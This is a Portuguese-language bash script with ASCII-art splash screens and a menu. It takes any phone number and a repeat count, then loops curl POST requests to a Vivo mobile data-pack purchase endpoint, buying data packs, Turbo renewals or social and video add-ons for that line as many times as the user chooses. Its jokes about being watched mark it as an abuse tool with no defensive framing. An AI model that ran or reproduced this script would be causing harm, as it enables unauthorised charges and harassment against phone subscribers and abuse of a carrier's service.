#!/bin/bash
clear
MSGS=("⣿⣿⣯⠉⠄⠄⠄⠄⠄⠄⡄⠄⠄⠄⠄⠄⠄⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⡟⠁⠄⠄⠄⠄⠄⢀⢀⠃⠄⠄⠄⠄⠄⠄⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⡇⠄⠄⣾⣳⠄⠄⢀⣄⣦⣶⣴⠂⢒⠄⠄⠄⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⡄⠄⠈⠚⡆⠄⢸⣿⣿⣿⣯⠋⡏⠄⠄⢸⣿⣿⣿⠿⠛⠛⠿⣿⣿⣿⣿⣿
⣿⣿⠟⣂⣀⣀⣀⡀⠠⠻⣷⣎⡼⠞⠓⠦⣤⣛⣋⣭⣴⣾⣿⣿⣷⣌⠻⣿⣿⣿
⣿⠋⣼⣿⣿⣿⣿⣿⣷⣦⣍⣙⠻⠳⠄⠄⠈⠙⠿⢿⣿⣿⣿⣿⣿⡟⣰⣿⣿⣿
⡟⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣄⣀⠄⠄⢀⣤⣤⣭⡛⠛⣩⣴⣿⣿⣿⣿
⣷⠸⠿⠛⠉⠙⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠛⠷⠦⣹⣿⣿⣿⣿
⣿⣧⠄⠄⠄⢀⣴⣷⣶⣦⣬⣭⣉⣙⣛⠛⠿⠿⠿⠟⠁⡀⠄⠄⠄⢁⣿⣿⣿⣿
⣿⣿⡅⠄⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣍⠲⣶⣤⣄⡀⠄⣴⣿⣿⣿⣿⣿
⣿⣿⣷⠄⣾⡏⢿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠄⠹⣷⡌⢿⣿⣿⣷⣦⡙⢿⣿⣿⣿
⣿⣿⣿⣷⡌⢷⡘⣿⣿⣿⣿⣿⣿⣧⣀⣀⡀⠄⠈⠹⡈⣿⣿⣿⣿⣿⣦⡙⣿⣿
⣿⣿⣿⣿⣿⣎⢷⡘⢿⣿⣿⣿⣿⣿⣿⣿⠃⠄⣼⣶⡇⣿⣿⣿⣿⣿⣿⠓⠜⣿
⣿⣿⣿⣿⣿⣿⣎⢻⣦⡙⠿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠄⣿⣿⣿⣿⣿⣿⣄⡀⢸
⣿⣿⣿⣿⣿⡿⢃⢼⣿⣿⣷⣤⣍⣉⣙⣛⣛⣉⣥⡄⠄⢿⣿⣿⣿⣿⡿⠟⣥⣿
⣿⣿⣿⡿⢋⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣿⣿⢁⣷⣤⣍⣉⣉⣭⣴⣾⣿⣿")
IMG2=("⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠛⠋⠉⠙⠻⠿⠿⠿⠿⢿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠃⠄⠄⠄⠄⠄⠄⠄⠄⠹⣿⣿⣶⣶⣦⣬⢹⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠄⠄⠄⣰⣧⡀⠄⠄⠄⠄⠈⢙⡋⣿⣿⣿⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠄⠰⠼⢯⣿⣿⣦⣄⠄⠄⠄⠈⢡⣿⣿⣿⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠄⠸⠤⠕⠛⠙⠷⣿⡆⠄⠄⠄⣸⣿⣿⡏⣼⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣴⣿⣿⣿⢡⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡟⠄⠄⠄⠄⠄⣄⠄⢀⠄⠄⢀⣤⣾⣿⣿⣿⢃⣾⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠿⣛⣡⣄⣀⠄⠠⢴⣿⣿⡿⣄⣴⣿⣿⣿⣿⣿⢃⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⡏⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣩⡽⡁⢸⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⢃⣿⣿⢟⣿⣿⣿⣿⣿⣮⢫⣿⣿⣿⣿⣿⣟⢿⠃⠄⢻⣿⣿⣿⣿
⣿⣿⣿⣿⡿⣸⠟⣵⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣿⣿⣿⣿⣷⣄⢰⡄⢿⣿⣿⣿
⣿⣿⣿⣿⡇⠏⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠹⡎⣿⣿⣿
⣭⣍⠛⠿⠄⢰⠋⡉⠹⣿⣿⣿⣿⣿⣿⠙⣿⣿⣿⣿⣿⣿⡟⢁⠙⡆⢡⣿⣿⣿
⠻⣿⡆⠄⣤⠈⢣⣈⣠⣿⣿⣿⣿⣿⠏⣄⠻⣿⣿⣿⣿⣿⣆⣈⣴⠃⣿⣿⣿⣿
⡀⠈⢿⠄⣿⡇⠄⠙⠿⣿⡿⠿⢋⣥⣾⣿⣷⣌⠻⢿⣿⣿⡿⠟⣡⣾⣿⣿⠿⢋
⠛⠳⠄⢠⣿⠇⠄⣷⡑⢶⣶⢿⣿⣿⣿⣽⣿⣿⣿⣶⣶⡐⣶⣿⠿⠛⣩⡄⠄⢸")
IMG3=("⠄⠄⠄⣀⣞⣵⢣⣩⣚⣞⠿⢍⡧⡻⡿⠟⠗⣄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢴⢿⢸⢘⢽⢓⢺⣷⣦⣯⣽⠪⢃⡄⡞⡇⢿⣦⡀⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠸⠈⠄⠄⠈⠢⠻⣫⣯⣯⠯⠝⢈⣷⡂⣽⡆⡿⠃⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⢀⡀⣤⣤⣦⣶⣿⢸⣿⢋⣢⣯⣯⣓⣼⣼⣯⠞⣫⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⣵⣿⣿⣿⣿⣿⠿⣣⡅⣟⢽⠟⢵⣾⣾⣶⣦⣉⠁⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠙⠿⠿⢟⣫⣶⣿⣿⡇⢯⠲⣁⣈⣹⣽⣿⣿⣿⣷⣦⡀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠈⣿⠿⢟⣫⣽⣶⣾⣿⣿⣿⣿⣿⠿⠿⠛⠉⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⣠⣴⣶⣿⡿⢟⣛⣭⣭⣯⣶⣶⣦⣤⣀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⣠⣾⢿⡿⠿⣛⣥⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⣷⣿⣿⣾⣶⣤⣄⠄⠄⠄
⢀⡞⠅⡜⣼⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⣵⣿⣿⣿⣿⣿⣿⣿⣷⣆⠄
⠄⣼⣧⡑⠑⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢟⣽⠷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆
⢸⣿⣷⣶⣷⣶⣶⣮⣭⣿⣿⣭⣯⢋⣵⡾⢃⣾⢊⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡘⠛⣐⣭⣶⣿⣿⣾⣛⣻⣿⣿⣿⣿⣿⡟⠄
⠐⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⣲⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠄⠄
⠄⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢃⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⠄⠄⠄")
IMG4=("⣿⣿⡻⠿⣳⠸⢿⡇⢇⣿⡧⢹⠿⣿⣿⣿⣿⣾⣿⡇⣿⣿⣿⣿⡿⡐⣯⠁ ⠄⠄
⠟⣛⣽⡳⠼⠄⠈⣷⡾⣥⣱⠃⠣⣿⣿⣿⣯⣭⠽⡇⣿⣿⣿⣿⣟⢢⠏⠄ ⠄
⢠⡿⠶⣮⣝⣿⠄⠄⠈⡥⢭⣥⠅⢌⣽⣿⣻⢶⣭⡿⠿⠜⢿⣿⣿⡿⠁⠄⠄
⠄⣼⣧⠤⢌⣭⡇⠄⠄⠄⠭⠭⠭⠯⠴⣚⣉⣛⡢⠭⠵⢶⣾⣦⡍⠁⠄⠄⠄⠄
⠄⣿⣷⣯⣭⡷⠄⠄⢀⣀⠩⠍⢉⣛⣛⠫⢏⣈⣭⣥⣶⣶⣦⣭⣛⠄⠄⠄⠄⠄
⢀⣿⣿⣿⡿⠃⢀⣴⣿⣿⣿⣎⢩⠌⣡⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠄⠄⠄
⢸⡿⢟⣽⠎⣰⣿⣿⣿⣿⣿⣿⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠄⠄
⣰⠯⣾⢅⣼⣿⣿⣿⣿⣿⣿⡇⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠄
⢰⣄⡉⣼⣿⣿⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⠄
⢯⣌⢹⣿⣿⣿⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄
⢸⣇⣽⣿⣿⣿⣿⣿⣿⣿⣿⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄
⢸⣟⣧⡻⣿⣿⣿⣿⣿⣿⣿⣧⡻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄
⠈⢹⡧⣿⣸⠿⢿⣿⣿⣿⣿⡿⠗⣈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠄
⠄⠘⢷⡳⣾⣷⣶⣶⣶⣶⣶⣾⣿⣿⢀⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠄
⠄⠄⠈⣵⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠄
⠄⠄⠄⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠄⠄")
IMG5=("⣿⣿⣿⣿⡿⢋⣴⣶⣄⡙⠻⣿⣿⠿⠟⣋⣉⣩⣭⣉⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠟⣡⣾⡿⠿⠿⠿⣿⣶⣄⠄⢾⣿⣿⣿⣿⣿⣿⣷⣄⠻⣿⣿⣿⣿⣿⣿⣿
⣿⡁⡾⠋⣡⣴⣶⣶⣦⣄⣈⣙⣃⠈⣋⣉⣉⣩⣭⣤⣬⣍⣂⣙⠻⠿⣿⣿⣿⣿
⣿⠁⣿⡿⠟⠛⢛⣉⠉⠉⠉⠉⠉⣁⣈⠙⠻⠿⠛⢋⡉⠉⠉⠉⠉⠁⠈⠹⣿⣿
⡏⢰⡡⠔⠚⠉⣀⠐⠄⠤⠤⣤⣄⣀⣀⠨⠕⣈⡥⠔⣒⡀⣀⠄⢤⣄⣀⠨⠈⠻
⡴⢃⣠⣤⣾⡟⠁⠘⡁⠠⠄⠈⢻⣿⣿⣿⣶⢀⣴⣿⡏⠄⢩⠄⠄⢹⣿⣿⣷⡄
⣧⠻⠿⣿⣿⡇⠄⠄⠄⠄⠄⢀⣼⣿⣿⠿⠋⠿⢿⣿⣧⡀⠄⠄⣠⣼⡿⠟⠛⣱
⣏⠉⠒⠠⠉⠙⠓⠂⠐⠒⠚⠉⠭⠁⠂⢈⣤⣶⣶⣶⣶⣬⣶⣶⣶⠶⣊⣥⣾⣿
⣿⣿⣿⣶⣶⣶⣶⣶⡶⠶⠒⣂⣠⣴⣾⣿⣿⣬⣉⠙⠛⠛⢋⣉⡐⠾⢿⣿⣿⣿
⣿⣿⣿⣿⣿⠿⠿⠧⠴⠶⠿⠿⠿⠿⠿⠿⠿⣿⣿⣿⣿⣿⡿⠿⠿⠓⢂⣉⠻⣿
⣿⣿⣿⠋⣠⠴⠶⠶⠶⠶⠶⠶⣶⣶⣶⣤⣤⣤⣤⣤⣤⣤⣴⣶⠶⠿⢛⣉⣴⣿
⣿⣿⡁⠘⠷⠶⠶⣶⣶⣶⣶⣦⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣶⡶⢈⣿⣿⣿
⣧⡈⠛⠲⠶⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣄⣉⣉⣉⣉⣉⠉⢩⣤⣤⣶⣿⣿⣿⣿
⠌⣉⣙⡛⠓⠿⠿⠿⠿⠿⠿⠻⠿⠟⠛⢋⣉⣩⣥⣥⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿
⠐⠂⠄⠉⠉⠓⠒⠒⠒⠒⠒⠒⠂⠄⠄⠄⠉⠉⠛⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿")
echo -e "$MSGS"; sleep 2.5; clear
echo -e "$IMG2"; sleep 2.5; clear
echo -e "$IMG3"; sleep 2.5; clear
echo -e "$IMG4"; sleep 2.5; clear
echo -e "$IMG5"; sleep 1
echo -e "\e[33;01mlegal, eu vou ser sua tia!\e[0m"
sleep 1.5
echo -e "\e[33;01mquem é esse atrás de você?\e[0m"
sleep 3
#!/bin/bash
touch contratos2
while :; do
clear
echo -e "   ⣀⣀⣤⣤⣴⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣶⣦⣤⣤⣄⣀⡀
 ⣴⣿⣿⡿⣿⢿⣟⣿⣻⣟⡿⣟⣿⣟⡿⣟⣿⣻⣟⣿⣻⢿⣻⡿⣿⢿⣷⣆
⢘⣿⢯⣷⡿⡿⡿⢿⢿⣷⣯⡿⣽⣞⣷⣻⢯⣷⣻⣾⡿⡿⢿⢿⢿⢯⣟⣞⡮
⢸⢞⠟⠃⣉⢉⠉⠉⠓⠫⢿⣿⣷⢷⣻⣞⣿⣾⡟⠽⠚⠊⠉⠉⠉⠙⠻⣞⢵
⢜⢯⣺⢿⣻⣿⣿⣷⣔⡄⠄⠈⠛⣿⣿⡾⠋⠁⠄⠄⣄⣶⣾⣿⡿⣿⡳⡌⡗
⢽⢱⢳⢹⡪⡞⠮⠯⢯⡻⡬⡐⢨⢿⣿⣿⢀⠐⡥⣻⡻⠯⡳⢳⢹⢜⢜⢜⢎
⣻⢌⠘⠌⡂⠈⠁⠉⠁⠘⠑⢧⣕⣿⣿⣿⢤⡪⠚⠂⠈⠁⠁⠁⠂⡑⠡⡈⢮
⣳⣿⣿⣽⣭⣶⣶⣶⣶⣶⣺⣟⣾⣻⣿⣯⢯⢿⣳⣶⣶⣶⣖⣶⣮⣭⣷⣽⣗
⢻⡿⡿⣟⣿⣻⣽⣟⣿⢯⣟⣞⡷⣿⣿⣯⢿⢽⢯⣿⣻⣟⣿⣻⣟⣿⣻⢿⣿
⡑⡏⠯⡯⡳⡯⣗⢯⢟⡽⣗⣯⣟⣿⣿⣾⣫⢿⣽⠾⡽⣺⢳⡫⡞⡗⡝⢕⠕
⢂⡎⠅⡃⢇⠇⠇⣃⣧⡺⡻⡳⡫⣿⡿⣟⠞⠽⠯⢧⣅⣃⠣⠱⡑⡑⠨⢐⢌
⠐⠼⣦⢀⠄⣶⣿⢿⣿⣧⣄⡌⠂⠢⠩⠂⠑⣁⣅⣾⢿⣟⣷⠦⠄⠄⡤⡇⡪
 ⠨⢻⣧⡅⡈⠛⠿⠿⠿⠛⠁⠄⢀⡀⠄⠄⠘⠻⠿⠿⠯⠓⠁⢠⣱⡿⢑⠄
 ⠈⢌⢿⣷⡐⠤⣀⣀⣂⣀⢀⢀⡓⠝⡂⡀⢀⢀⢀⣀⣀⠤⢊⣼⡟⡡⡁
  ⠈⢢⠚⣿⣄⠈⠉⠛⠛⠟⠿⠿⠟⠿⠻⠻⠛⠛⠉⠄⣠⠾⢑⠰⠈
    ⠑⢌⠿⣦⡡⣱⣸⣸⣆⠄⠄⠄⣰⣕⢔⢔⠡⣼⠞⡡⠁
      ⠑⢝⢷⣕⡷⣿⡿⠄⠄⠠⣿⣯⣯⡳⡽⡋⠌
        ⠙⢮⣿⣽⣯⠄⠄⢨⣿⣿⡷⡫⠃
          ⠘⠙⠝⠂⠄⢘⠋⠃ "
echo
echo -e '\033[01;37mRaj, escolhe uma carta\033[0m'
echo -e "\033[0m\033[01;37m(1) \033[01;32mContratar 100MB\033[0m"
echo -e "\033[0m\033[01;37m(2) \033[01;32mContratar 200MB\033[0m"
echo -e "\033[0m\033[01;37m(3) \033[01;32mContratar 400MB\033[0m"
echo -e "\033[0m\033[01;37m(4) \033[01;32mRenovar Vivo Turbo\033[0m"
echo -e "\033[0m\033[01;37m(5) \033[01;32mContratar Redes Sociais\033[0m"
echo -e "\033[0m\033[01;37m(6) \033[01;32mContratar Vídeo e Música\033[0m"
echo -e "\033[0m\033[01;37m(7) \033[01;32mCair Fora\033[0m"
read -n1 -p 'Opção:' opc
echo
case $opc in
     (1) echo -e '\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[0m'
         read NUMERO
         echo -e '\e[00;37;01mREPETIR QUANTAS VEZES? relaxe\e[m'
         read VEZES
         echo
         echo -e "\e[37;01mNUMERO:\e[0m\e[32;01m$NUMERO\e[0m \e[37;01mQUANTIDADE DE VEZES:\e[0m\e[32;01m$VEZES\e[0m"
         echo -e '\033[01;37msend:false,return:true = \033[01;32mfoi tudo\e[0m'
         for i in $(seq $VEZES);
         do
         echo
         echo -e "\e[32;01m$i\e[0m \e[00;37;01mA merda feita:...\e[0m"
data=$"pack=100c&act=buypack&impressionUUID=&ispClickId=&logPack=100mb&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "$site" -d "$data"
            done
            echo
            echo -e '\033[01;32mEsse é meu garoto\e[0m'
            sleep 2
            break;;
        (2) echo -e '\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m'
         read NUMERO
         echo -e '\e[00;37;01mREPETIR QUANTAS VEZES? relaxe\e[m'
         read VEZES
         echo
         echo -e "\e[37;01mNUMERO:\e[0m\e[32;01m$NUMERO\e[0m \e[37;01mQUANTIDADE DE VEZES:\e[0m\e[32;01m$VEZES\e[0m"
         echo -e '\033[01;37msend:false,return:true = \033[01;32mfoi tudo\e[0m'
         for i in $(seq $VEZES);
         do
         echo
         echo -e "\e[32;01m$i\e[0m \e[00;37;01mA merda feita\e[0m"
data=$"pack=200CPRE&act=buypack&impressionUUID=&ispClickId=&logPack=200cpre&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "$site" -d "$data"
            done
            echo
            echo -e '\033[01;32mEsse é meu garoto\e[0m'
            sleep 2
            break;;
        (3) echo -e '\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m'
         read NUMERO
         echo -e '\e[00;37;01mREPETIR QUANTAS VEZES? relaxe\e[m'
         read VEZES
         echo
         echo -e "\e[37;01mNUMERO:\e[0m\e[32;01m$NUMERO\e[0m \e[37;01mQUANTIDADE DE VEZES:\e[0m\e[32;01m$VEZES\e[0m"
         echo -e '\033[01;37msend:false,return:true = \033[01;32mfoi tudo\e[0m'
         for i in $(seq $VEZES);
         do
         echo
         echo -e "\e[32;01m$i\e[0m \e[00;37;01mA merda feita\e[0m"
data=$"pack=400c&act=buypack&impressionUUID=&ispClickId=&logPack=400mb_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "$site" -d "$data"
            done
            echo
            echo -e '\033[01;32mEsse é meu garoto\e[0m'
            sleep 2
            break;;
        (4) echo -e '\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m'
         read NUMERO
          echo -e '\e[00;37;01mREPETIR QUANTAS VEZES? relaxe\e[m'
         read VEZES
          echo
          echo -e "\e[37;01mNUMERO:\e[0m\e[32;01m$NUMERO\e[0m \e[37;01mQUANTIDADE DE VEZES:\e[0m\e[32;01m$VEZES\e[0m"
          echo -e '\033[01;37msend:false,return:true = \033[01;32mfoi tudo\e[0m'
          for i in $(seq $VEZES);
          do
          echo
          echo -e "\e[32;01m$i\e[0m \e[00;37;01mA merda feita\e[0m"
data=$"pack=ANTECIPARVT&act=buypack&impressionUUID=&ispClickId=&logPack=vivotudo_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "$site" -d "$data"
            done
            echo
            echo -e '\033[01;32mEsse é meu garoto\e[0m'
            sleep 2
            break;;
        (5) echo -e '\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m'
         read NUMERO
          echo -e '\e[00;37;01mREPETIR QUANTAS VEZES? relaxe\e[m'
         read VEZES
          echo
          echo -e "\e[37;01mNUMERO:\e[0m\e[32;01m$NUMERO\e[0m \e[37;01mQUANTIDADE DE VEZES:\e[0m\e[32;01m$VEZES\e[0m"
          echo -e '\033[01;37msend:false,return:true = \033[01;32mfoi tudo\e[0m'
          for i in $(seq $VEZES);
          do
          echo
          echo -e "\e[32;01m$i\e[0m \e[00;37;01mA merda feita\e[0m"
          data=$"pack=FACE&act=buypack&impressionUUID=&ispClickId=&logPack=vivoturbo_redessociais_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "$site" -d "$data"
            done
            echo
            echo -e '\033[01;32mEsse é meu garoto\e[0m'
            sleep 2
            break;;
            (6) echo -e '\e[00;37;01mDIGITE O NÚMERO DDD+NÚMERO\e[m'
            read NUMERO
            echo -e '\e[00;37;01mREPETIR QUANTAS VEZES? relaxe\e[m'
            read VEZES
            echo
            echo -e "\e[37;01mNUMERO:\e[0m\e[32;01m$NUMERO\e[0m \e[37;01mQUANTIDADE DE VEZES:\e[0m\e[32;01m$VEZES\e[0m"
          echo -e '\033[01;37msend:false,return:true = \033[01;32mfoi tudo\e[0m'
          for i in $(seq $VEZES);
          do
          echo
          echo -e "\e[32;01m$i\e[0m \e[00;37;01mA merda feita\e[0m"
data=$"pack=MUVI&act=buypack&impressionUUID=&ispClickId=&logPack=vivoturbo_videomusica_bn&telefone=$NUMERO" && site=$"http://navegue.vivo.ddivulga.com/comprar" && curl "$site" -d "$data"
            done
            echo
            echo -e '\033[01;32mEsse é meu garoto\e[0m'
            sleep 2
            break;;
        (7) echo -e '\e[01;37mSem Choro |\e[0m \e[01;33m@EhisOpeNer\e[0m\n\e[37;01mMais?\e[0m \e[01;33mmedo tem não\e[0m'
            rm contratos2; sleep 1
            exit
            break;;
        (*) echo -e '\033[1;31mCalma barboleta\033[1;37m'
            sleep 1
            esac
            done
            echo
            while :; do
            echo -e '\e[0m\e[01;33mDe novo?!\e[0m'
            echo -e '\e[01;37m(1)\e[0m \e[01;32mSim, vem tranquilo\e[0m'
            echo -e '\e[01;37m(2)\e[0m \e[01;32mNão, acho que tô sendo vigiado\e[0m'
            read -n1 -p 'Opção:' cpo
            echo ""
            case $cpo in
            (1) echo -e '\e[0m\e[01;37mE lá vamos nós |\e[0m \e[01;33m@EhisOpeNer\e[0m'
            sleep 2; clear
            tail -n +90 contratos > contratos2 && chmod +x contratos2 && ./contratos2
        break;;
            (2) echo -e '\e[01;37mSem choro |\e[0m \e[01;33m@EhisOpeNer\e[0m\n\e[37;01mMais?\e[0m \e[01;33mmedo tem não\e[0m'
            rm contratos2; sleep 2
            break;;
            (*)  echo -e '\e[01;33mCalma barboleta\e[0m'
            sleep 1
            echo ""
            esac
            done
